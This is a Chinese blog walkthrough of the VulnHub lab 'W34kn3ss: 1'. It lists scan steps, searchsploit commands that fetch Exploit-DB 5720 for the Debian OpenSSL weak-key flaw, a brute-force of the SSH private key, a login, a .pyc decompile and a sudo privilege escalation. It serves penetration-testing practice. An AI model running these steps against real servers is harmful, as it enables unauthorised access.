W34kn3ss: 1

最新推荐文章于 2024-08-28 21:14:18 发布
最新推荐文章于 2024-08-28 21:14:18 发布
阅读量304 收藏 3
点赞数 5
文章标签: 安全 网络 测试工具 linux 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53626662/article/details/141193395
版权

一、主机发现

二、信息收集

1.访问首页

2.目录扫描

访问/test/

3.全端口扫描

发现域名,weakness.jth

在hosts,将域名绑定到ip

4.访问weakness.jth

5.ip拼接访问/upload.php

6.编辑kali的hosts

7.目录扫描

1)域名拼接/private

查看第一个,ssh的密钥文件

查看第二个,密钥的生成方式,有版本

2)上kali寻找相关漏洞

searchsploit openssl 0.9.8c-1

3)下载txt是漏洞解释,py是利用脚本

searchsploit -x /linux/remote/5622.txt
searchsploit -m /linux/remote/5720.py

4)下载文件

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5622.tar.bz2  # 放置于kali 解压
tar -jxvf 5622.tar.bz2

解压后

5)下载网站文件

wget http://weakness.jth/private/files/mykey.pub

三、信息利用

1.爆破

python2 5720.py ./rsa/2048 192.168.7.135 n30 22
# n30 是兔子尾巴那里的,当作用户名
# 下载的rsa文件./rsa/2048

2.得到密码,需要等一会

4161de56829de2fe64b9055711f531c1-2537

3.ssh连接,在rsa/2048下进行ssh连接

ssh n3@192.168.1.9 -i 4161de56829de2fe64b9055711f531c1-2537

四、提权

1.查看code文件

2.查看文件类型

file code

3.先用靶机开启http服务,接着攻击机下载code,修改后缀为.pyc,然后用uncompyle6反编译

1)开临时服务

2)远程下载

wget http://192.168.7.135:8001/code

3)改后缀

mv code code.pyc

4)配置环境变量


pip install uncompyle6

5)反编译


uncompyle6 code.pyc > code.py

6)查看文件code

7)sudo su提权,输入刚刚的密码,提权成功

蓝天模糊
关注
  • 5
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
靶机系列--W34KN3SS
Nginxx的博客
12-02 1347
靶机系列
c#二进制文件数据转换base64字符串文本代码
dcryefx44317的博客
11-24 4万+
using System; using System.Text; namespace ConsoleTest { internal class Program { private static void Main(string[] args) { string aaa = ...
vulnhub W34kn3ss: 1
箭雨镜屋
07-31 702
渗透思路:nmap扫描端口 ---- gobuster扫描网站目录 ---- 修改hosts文件,并扫描网站目录 ---- 利用OpenSSL 0.9.8c-1可预测伪随机数漏洞爆破ssh私钥 ---- uncompyle6反编译.pyc ---- sudo su提权
红队打靶练习:W34KN3SS: 1
分享
01-20 462
红队打靶练习:W34KN3SS: 1。emm,都是见过的openssl密码碰撞+python反编译,没啥难的!
W34KN3SS靶机
weixin_74232792的博客
08-05 628
python2 5720.py ./rsa/2048 192.168.101.93 n30 22 其n30是之前发现的,当做用户名,./rsa/2048,方便起见,将rsa文件夹和py脚本都放到桌面上,爆破成功后用私钥连接ssh。攻击机上下载code,改名为code.pyc,然后用uncompyle6反编译。notes.txt有提示,openssl的版本,mykey有一个公钥。放到kali上解压,解压完会生成一个rsa文件夹。kali也绑定该域名,再次目录扫描,发现新东西。端口目录扫描,有一个域名。
W34kn3ss 1靶机
hqy250019的博客
08-11 707
当我们检查代码的文件类型时,发现是一个python编译的文件,把它复制到/var/www/html,就可以在系统上下载这个文件了。打开mykey.pub,是base64编码的ssh公钥,在在线解码器里面没有解出来,应该需要借助工具。网址进行访问http://weakness.jth,访问是空白页面的话,换一个浏览器就可以了。页面访问443端口,会提示用https服务,会出现和80端口一样的页面,进行目录扫描。各处看了一下,好像没有什么信息了,就只剩22、443端口了,查看443端口,对这个文件进行重命名。
靶机W34KN3SS练习报告1
08-08
"靶机W34KN3SS练习报告1"提供了一个详细的过程,展示了如何逐步攻破一个虚拟靶机,并最终获取root权限。以下是这个过程中的关键知识点: 1. **虚拟机导入与启动**:靶机是以.ova格式提供的,可以使用VirtualBox或...
Python调用kafka构建完整实例分析与应用!
热门推荐
爬遍所有网站
06-06 7万+
近期遇到一个需求就是我们需要把当前比较耗费资源的接口开发成异步通讯的机制,简单来说就是有一个消息队列来不停地进行消息的集中分发与任务处理,这里应用端给出的方案是使用kafka来做,但是这个我在之前没有接触过,所以没有头绪,就想着在本机搭建一下kafka的环境,来去熟悉整个操作过程。 接下来就先开始kafka环境的安装。kafka的安装需要依赖于zooeleeper模块,虽然说kafka自带了zooeleeper模块,但是网上清一色的教程都说还是需要自己手动提前去安装zooeleeper模块才行的,所以..
和oscp相似的靶机-hackthebox & vulnhub (OSCP-LIKE HACKTHEBOX & VULNHUB)
冬萍子癸水
04-06 3132
每台都做一做,然后记录在博客里.供自己和大家一起学习.
安全面试常见问题任意文件下载
persist213的博客
08-24 733
吉祥知识星球《网安面试指南》《Java代码审计》《Web安全》《应急响应》《护网资料库》
经验笔记:Token、Session、Cookie 及密码级别安全存储
最新发布
qq_45831414的博客
08-28 327
在用户通过身份验证后,服务器会生成一个Token并发给客户端,之后客户端会在每次请求中附带此Token以证明身份。当用户开始与Web应用互动时,服务器会创建一个唯一的Session ID,并将其存储在客户端的Cookie中。本文将探讨如何利用Token、Session 和 Cookie 这三个概念来实现安全的用户认证及会话管理,并重点介绍如何存储密码以达到最高级别的安全性。综合运用Token、Session 和 Cookie,结合安全的密码存储技术,能够显著提高Web应用的安全性和用户体验。
“北京地铁系统中人脸识别技术的安全与效率问题研究”
matlabgoodboy的博客
08-28 363
综上所述,北京地铁系统中人脸识别技术的应用在提高安检和售检票效率方面具有显著优势,但同时也面临着数据隐私保护和滥用风险等安全问题。为了充分发挥人脸识别技术的优势并降低其风险,需要建立健全的法律法规和监管机制,并不断优化技术算法和管理手段。
终端防火墙软件功能 | 在终端设备上启用防火墙!终端安全小课堂开讲啦
2401_86434954的博客
08-24 545
终端设备的安全性直接关系到企业的整体网络安全,随着网络威胁的日益复杂和多样化,启用并合理配置终端防火墙软件是保障终端安全不可或缺的一环。今天,我们将走进终端安全小课堂,详细解析中的防火墙功能,为您揭开其保护终端安全的神秘面纱。
你的软件系统安全
温故而知新
08-22 980
如果你的软件系统可以通过网络访问, 可以由多人操作, 可以访问或操作敏感数据, 或者可能暴露隐私, 等等, 请一定要保护你的系统. 那么你的软件系统安全吗? 一. 先问自己如下 4 个问题 1. What are we working on? 我们的系统在干啥? 例如电商系统: 我们在卖啥? 提供什么售前和售后服务? 用户和帐备信息怎么管理的? 数据是如何防护和归档的? 等等 2. What ...
云等保安全合规解决方案
bocco的博客
08-23 426
在此背景下,云等保(云安全等级保护)安全合规解决方案应运而生,旨在为企业构建一套全面、高效、符合国家安全标准的云安全防护体系。通过构建全面、高效、符合国家安全标准的云安全防护体系,企业不仅能够有效应对云环境中的安全挑战,还能够提升业务竞争力,实现可持续发展。它要求云服务提供商和云租户按照不同的安全等级,采取相应的安全控制措施,确保云环境中的数据、应用及基础设施免受未经授权的访问、使用、泄露、中断、破坏等安全威胁。1. 提升安全性:通过实施云等保,企业能够构建更加安全、可靠的云环境,有效抵御各类安全威胁。
DNS部署与安全
m0_64827698的博客
08-28 946
子域 二级域 顶级域 根域。本地域名服务器(代替主机迭代)去找根域名服务器——>...服务器——>权威服务 客户端。特定服务 公司或组织的名称 公司/国家/...(网站性质或地域)DNS缓存投毒(改映射)、DNS放大攻击(分布拒绝服务DDOS)、子域名劫持。主机找网关(本地域名服务器) 客户端。DNS查询(小数据包,要求速度快),www通常指公司网站的主服务器
HSE软件组件有哪些?如何实现HSE与主机的通信(同步/异步)?如何使用HSE提供的安全服务?
车载系统攻城狮
08-28 565
从软件组成和接口的使用上对HSE做了更进一步的阐述,消息单元MU在实现主机与HSE的通信过程中扮演着重要的角色,最后给出使用HSE服务的示例,包括同步方式和异步方式!
安全】ssrf
weixin_65583879的博客
08-28 825
的危害,但是curl支持很多协议(curl --version 可以查看其支持的协议),有FTP,FTPS,HTTP,HTTPS,GOPHER,TELNET,接着我们便可以尝试 redis 未授权了,由于这台内网主机上还存在一个http服务,所以我们可以将webshell写入其web目录,然后用ssrf进行访问。没有过滤http协议和gopher协议,我们使用http协议进行探测,发现 172.18.0.3上只有80端口开放,没有3306,6379等端口开放。原本访问外链资源不会有太大。
R语言代码编写 提取大写字母后的数字 df<-tibble(x=c("12W34", "AB2C46", "B217C","akTs6df","21WD4"))
06-07
您好!根据您的要求,可以使用...3. 然后,我们使用 `\\1` 表示替换成正则表达式中第一个括号匹配的内容,也就是提取的数字。 4. 最后,我们将提取到的数字存储在一个新的列 `number` 中。 希望这个代码可以帮助到您!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值